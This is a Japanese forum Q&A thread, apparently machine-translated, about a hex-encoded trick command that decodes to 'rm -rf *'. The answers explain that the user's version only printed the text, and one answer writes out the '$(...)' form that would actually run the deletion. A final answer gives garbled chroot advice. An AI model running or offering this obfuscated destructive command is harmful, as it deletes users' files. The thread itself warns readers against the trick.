オンライン フォーラムで、誰かが (おそらく私と一緒に荒らしをするつもりで) ターミナルにこれを入力するように言っていました。
(echo 726d202d7266202a | xxd -r -p)
何か害があるかどうか分からないので、これを入れないでください。
ターミナルに次のように返されました:
rm -rf *ryanmcclure@RyansLinuxBox:~$
rm -rf *これによって何かが削除されましたか?すべてを削除するひどいコマンドだと聞いたので、気になっています。
編集: これを読んでいる人全員に知っておいてもらいたいのですが、ターミナルで ASCII アート アニメーションを表示するには、これを入力するように言われました。これは私を騙すために使われたトリックなので注意してください。
答え1
いいえ、何も起こりませんでした。ただ危うい状況だっただけです。
括弧はbash(シェル)にサブシェルの内容を実行するように指示します(これはあまり意味がありません)。実行されるコマンドは、echo 726d202d7266202a | xxd -r -p画面に「rm -rf *」というテキストを出力する以外は何もしません。走るそのテキストをコマンドとして実行するのではなく、単にテキストを画面に出力しないと、問題が発生します。とにかく、これは、インターネットから取得した理解できないコマンドを実行しないための無料のレッスンになります。
答え2
「魚を与えるより魚の釣り方を教える方が良い」という精神で、ターミナルに次のように入力することをお勧めします。man xxd(はい、私はターミナルに何かを入力するように指示するもう一人の人間です...ただし、manコマンドは安全であると認識する必要があります)。
を知らない方はecho、あなたもそれをチェックしてください基本的に、リストしたコマンドは文字列を標準出力に「エコー」します。
ただし、パイプは|その標準出力をコマンドの標準入力に送りますxxd。この場合、16 進数の文字列を通常の形式の入力に変換するように設定されています。
簡単に答えると、いいえ、何も削除されませんでした。しかし、rm -rf *画面に反映されたので、少し怖くなったに違いありません :-)
答え3
攻撃者はおそらく、 を$(echo 726d202d7266202a | xxd -r -p)シェルに貼り付けさせようとしたのでしょう。 xxd は、 726d202d7266202a を にデコードしrm -rf *、それが実行されます。
答え4
誰かがあなたのファイルシステムをいじっているのではないかと心配しているなら、それはchrootあなたの自由ですchroot /random/directory。コマンドを徹底的に実行してください。